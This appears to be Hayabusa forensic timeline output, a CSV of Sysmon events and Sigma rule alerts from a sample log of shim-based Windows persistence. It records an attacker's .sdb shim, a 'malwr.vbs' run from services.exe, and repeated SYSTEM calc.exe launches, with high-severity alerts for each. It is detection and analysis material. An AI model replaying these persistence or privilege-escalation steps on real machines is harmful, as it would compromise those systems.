2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by
Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.603 
+09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 
365ABB72-77C4-5C91-0000-0010EA870100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 
365ABB72-785E-5C91-0000-001031E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 